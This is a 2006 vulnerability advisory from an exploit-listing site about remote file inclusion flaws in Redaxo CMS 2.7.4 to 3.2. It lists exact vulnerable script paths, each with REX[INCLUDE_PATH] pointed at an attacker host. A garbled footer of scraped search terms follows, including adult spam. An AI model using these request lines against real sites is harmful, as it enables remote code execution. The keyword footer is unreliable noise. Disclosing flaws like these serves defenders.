about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Redaxo CMS <= 3.2 (INCLUDE_PATH) Remote File Include Vulnerabilities




2006-06-02 Redaxo CMS <= 3.2 (INCLUDE_PATH) Remote File Include Vulnerabilities 
Rated as : High Risk

Script: Redaxo CMS
Vendor: http://www.redaxo.de
Discovered: beford <xbefordx gmail com>

Redaxo 3.2 - 3.1 - 3.0

./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

Redaxo 3.0

./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

Redaxo 2.7.4

./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
./redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=attacker

securitydot.net - 2006-06-02

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 05:04:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
22904.c mike animals sx news for c india cele q-shop Teensex ph Tamil sexy Sexgils.co www gaysex http://www www.ac1s.c cat /etc// Indian sex www.moviel www..69.co www.raj.co www gaysex Login+to+C www.alidao php nuke 8 xvidoe fre exploit 2. /search/ex chat sex news for c byonce www.today. Enter www.daseba www.dldvb. www.sexigi mod_gzip 1400hk.cn www.boii www.3glc.c Metal slac Wwwsexco SUNONE sexy photo deshi.com for sex p sexnt kusubu fotos d mu www.cfjksh MS03-011 Wwwsexylad www.arsen www.ldgmy.